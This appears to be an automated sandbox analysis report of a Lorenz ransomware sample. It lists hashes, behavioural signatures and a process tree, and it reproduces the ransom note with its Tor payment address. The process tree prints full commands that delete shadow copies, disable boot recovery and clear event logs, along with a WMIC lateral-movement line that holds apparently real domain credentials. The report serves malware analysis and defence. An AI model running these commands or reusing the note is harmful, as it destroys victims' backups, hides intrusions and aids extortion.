Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    11-08-2024 00:54

General

  • Target

    885c935f89580c98444c64b2710378d2_JaffaCakes118.exe

  • Size

    1016KB

  • MD5

    885c935f89580c98444c64b2710378d2

  • SHA1

    ec3a9cde30a280b825f9603ed6d2f346a24e27d5

  • SHA256

    c0c99b141b014c8e2a5c586586ae9dc01fd634ea977e2714fbef62d7626eb3fb

  • SHA512

    4f2c306cf06d09e6cf776c2a2947239982d27a058b4104875d00c8a623a8ceafeeba8a5b1afdf86c841aa0972f235556f7214e28c4fd8d1936237520c388c0be

  • SSDEEP

    24576:LibnUPR2bYg1yiwKZycSQLyMTNuSBOpFhA8ld8Wm8/uyA:ubCR2bIoyqG4ZBObd8WmRyA

Malware Config

Extracted

Path

C:\Users\Public\Desktop\HELP_SECURITY_EVENT.html

Ransom Note
.sz40<br><style>.container{position:relative;text-align: center;}.top-right{position:absolute;top:20px;left:50%;transform:translate(-50%, -50%);}</style><table align ="center" width="50%" style="border:1px solid red;"><tr><div class="container"><img width="50%" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAoAAAAQCAIAAACgHXkXAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAEpJREFUeNpiYMALGFdYWuORZvn95Qs+6Z8fPuKT/vX9O17Df/zAq/vnT7zSv3/jNRyvv1n+UCQNMfw/WliSphunNCMTMwPZACDAAM86GalyBR+JAAAAAElFTkSuQmCC"/><div class="top-right"><h1><p style="color:#FFD700">Lorenz ransomware</p></h1></div><th><td><b>Good day</b>!<br>We have download and encrypted all your company files!<br><br>We did this using hybrid RSA - 2048 public key encryption.It basically means there is no way to decrypt your files without the private key.<br>The private key is stored on our server.<br><br>Indeed, we can recover your files. You just have to pay us before the deadline.<br>If you don't, the private key will be securely erased from our server, you lose encrypted files forever and we will publish all the contents of your company includes databases with SSN and diagnosis, correspondence, invoice's, signature's, confidential medical history's, balance sheet's etc. on the internet, send it to mass media and your customers.<br><br> Leave your contact mail to <b>http://egypghtljedbs3x3ui45tfhosakzb376epl7baq2ruzfyewcypswhgqd.onion/index.php</b> (it's Tor site, use Tor Browser <b>https://www.torproject.org/download/</b>) to get instructions and key to restore all your files. <br>Or leave your contact mail to decrypt 2 files for free.<br> After payment will recieve, we securely delete all your files from our servers.<br> <b>Deadline: 02.15.2021</b><b><br><br><b>WARNING!</b> Antivirus software, police or anyone can't decrypt your files. Also any attemps to modify files may damaged them and even we won't be able to recover them.<br><br></td></th></tr></table>

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Clears Windows event logs 1 TTPs 16 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (315) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\885c935f89580c98444c64b2710378d2_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\885c935f89580c98444c64b2710378d2_JaffaCakes118.exe"
    1⤵
    • Enumerates connected drives
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2356
    • C:\Windows\SysWOW64\wbem\WMIC.exe
      "C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2644
    • C:\Windows\SysWOW64\wbem\WMIC.exe
      "C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"'
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2688
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'wolfeclinicpc.int\RSMAdmin' /PASSWORD:'4Myiz0nlY' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\wolfeclinicpc.int\NETLOGON\sinhost.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"
      2⤵
      • Indicator Removal: Clear Persistence
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic /node:'0.0.0.0' /USER:'wolfeclinicpc.int\RSMAdmin' /PASSWORD:'4Myiz0nlY' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\wolfeclinicpc.int\NETLOGON\sinhost.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"
        3⤵
        • Indicator Removal: Clear Persistence
        • System Location Discovery: System Language Discovery
        PID:2832
    • C:\Windows\SysWOW64\wbem\WMIC.exe
      "C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"'
      2⤵
      • System Location Discovery: System Language Discovery
      PID:856
  • C:\Windows\system32\cmd.exe
    cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2788
    • C:\Windows\System32\Wbem\WMIC.exe
      WMIC.exe shadowcopy delete /nointeractive
      2⤵
        PID:2804
      • C:\Windows\system32\bcdedit.exe
        bcdedit.exe /set {default} recoveryenabled no
        2⤵
        • Modifies boot configuration data using bcdedit
        PID:1700
      • C:\Windows\system32\bcdedit.exe
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        2⤵
        • Modifies boot configuration data using bcdedit
        PID:2244
    • C:\Windows\system32\cmd.exe
      cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2800
      • C:\Windows\system32\wevtutil.exe
        wevtutil cl "security"
        2⤵
        • Clears Windows event logs
        PID:808
      • C:\Windows\system32\wevtutil.exe
        wevtutil cl "windows powershell"
        2⤵
        • Clears Windows event logs
        PID:1416
      • C:\Windows\system32\wevtutil.exe
        wevtutil cl "security"
        2⤵
        • Clears Windows event logs
        PID:2128
      • C:\Windows\system32\wevtutil.exe
        wevtutil cl "Application"
        2⤵
        • Clears Windows event logs
        PID:620
      • C:\Windows\system32\wevtutil.exe
        wevtutil cl "HardwareEvents"
        2⤵
        • Clears Windows event logs
        PID:3060
      • C:\Windows\system32\wevtutil.exe
        wevtutil cl "System"
        2⤵
        • Clears Windows event logs
        PID:688
      • C:\Windows\system32\wevtutil.exe
        wevtutil cl "Setup"
        2⤵
        • Clears Windows event logs
        PID:2416
      • C:\Windows\system32\wevtutil.exe
        wevtutil cl "Setup"
        2⤵
        • Clears Windows event logs
        PID:1776
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
        PID:560
      • C:\Windows\system32\cmd.exe
        cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1296
        • C:\Windows\system32\wevtutil.exe
          wevtutil cl "security"
          2⤵
          • Clears Windows event logs
          PID:2032
        • C:\Windows\system32\wevtutil.exe
          wevtutil cl "windows powershell"
          2⤵
          • Clears Windows event logs
          PID:1560
        • C:\Windows\system32\wevtutil.exe
          wevtutil cl "security"
          2⤵
          • Clears Windows event logs
          PID:2212
        • C:\Windows\system32\wevtutil.exe
          wevtutil cl "Application"
          2⤵
          • Clears Windows event logs
          PID:1540
        • C:\Windows\system32\wevtutil.exe
          wevtutil cl "HardwareEvents"
          2⤵
          • Clears Windows event logs
          PID:2596
        • C:\Windows\system32\wevtutil.exe
          wevtutil cl "System"
          2⤵
          • Clears Windows event logs
          PID:340
        • C:\Windows\system32\wevtutil.exe
          wevtutil cl "Setup"
          2⤵
          • Clears Windows event logs
          PID:208
        • C:\Windows\system32\wevtutil.exe
          wevtutil cl "Setup"
          2⤵
          • Clears Windows event logs
          PID:1744

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Public\Desktop\HELP_SECURITY_EVENT.html

        Filesize

        1KB

        MD5

        0537a10b3c140325325c334e5ae80ff0

        SHA1

        c44f6df2ba8862f9649a627dda1e120c5bba9667

        SHA256

        8cd7eb16464a0a52f6ff0c542bb7d5a3c3c772e52dc347c024ee836a5377247b

        SHA512

        eebd9c2a41b0ccbbcec147e081cf9f2c19dcd50412a1acc3fc97b7d94f9c62d5a0f36c5e50df150a528ca4a5ba257c00872ef7f27990e54a8f086998c25d4dc9